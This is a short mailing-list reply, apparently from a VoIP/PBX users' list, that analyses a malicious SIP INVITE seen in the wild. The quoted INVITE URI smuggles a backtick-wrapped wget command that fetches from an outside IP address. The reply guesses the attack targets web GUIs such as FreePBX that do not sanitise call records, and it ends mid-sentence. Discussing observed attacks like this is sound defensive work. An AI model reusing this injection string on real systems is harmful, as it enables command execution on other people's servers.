On 09/11/2011 07:05 PM, Tom Browning wrote:
> INVITE sip:00123456789000`wgetx20-Ox20/dev/nullx20http://126.96.36.199/V.email@example.com
My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing your CDRs, for instance, you might click on such a link.
A more sophisticated variant of that would embed